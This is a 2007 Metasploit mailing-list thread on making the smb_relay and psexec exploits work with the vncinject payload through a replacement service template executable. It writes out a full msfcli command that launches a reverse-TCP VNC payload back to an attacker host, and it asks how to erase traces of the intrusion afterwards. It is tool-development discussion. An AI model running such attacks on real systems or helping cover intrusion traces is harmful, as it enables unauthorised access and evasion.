Metasploit mailing list archives
Re: smb_relay and vncinject
From: sigtrap at sigtrap.org (sigtrap)
Date: Wed, 21 Nov 2007 14:24:50 +0100
Hi, I now have a new "service template.exe". I managed to steal 10 minutes from my friend Magnus Br?ding, in which he threw together a service executable template PoC (yes, we're sorry it's bloated :-)) It's attached with the password: "password" (without the quotes) Got it? ;-) If you backup the original template.exe and use this instead, the exploits psexec and smb_relay will work as intended (other exploits, that don't expect a service exe, probably won't work). Eg: ./msfcli windows/smb/smb_relay DisableCourtesyShell=1 LHOST=169.254.133.7 PAYLOAD=windows/vncinject/reverse_tcp EXITFUNC=process E The service is created and starts. The payload is executed in a new thread. The service controller *doesn't* kill the process after 30 seconds anymore, as it does with the normal template.exe. When you terminate the vncclient the payload terminates the process through the "EXITFUNC=process". The Windows service MMC snap-in will now report the created service as "stopped". If we could now just make the handler (i.e. the one that that starts the VNC client on the attacking computer) report back to the exploit when the payload on the victim computer has ended (and thus its process has also terminated in this case), it would be easy to remove the service and executable on the victim computer, thereby leaving no bigger trace behind of the intrusion. I don't know how to do this, but it would be really great if someone did. Regards //Sigtrap -----Original Message----- From: H D Moore <hdm at metasploit.com> To: framework at metasploit.com Date: Mon, 10 Sep 2007 10:26:01 -0500 Subject: Re: [framework] Re: smb_relay and vncinject
Patrick nailed it. The SCM seems to be unhappy if the service start function doesn't return. To resolve this, we need spawn a new thread from within the wrapper exe and return a successful result back. Is anyone familiar with writing EXE-based Windows services? -HD On Monday 10 September 2007 09:49, Patrick Webster wrote:It would appear that Windows is killing your VNC service after 30 seconds because the service did not return a successful start signal back to the OS within this period.
-------------- next part -------------- A non-text attachment was scrubbed... Name: template.exe.bin.pgp Type: application/octet-stream Size: 224107 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20071121/5de116d9/attachment.obj>
Current thread:
- Re: smb_relay and vncinject sigtrap (Nov 21)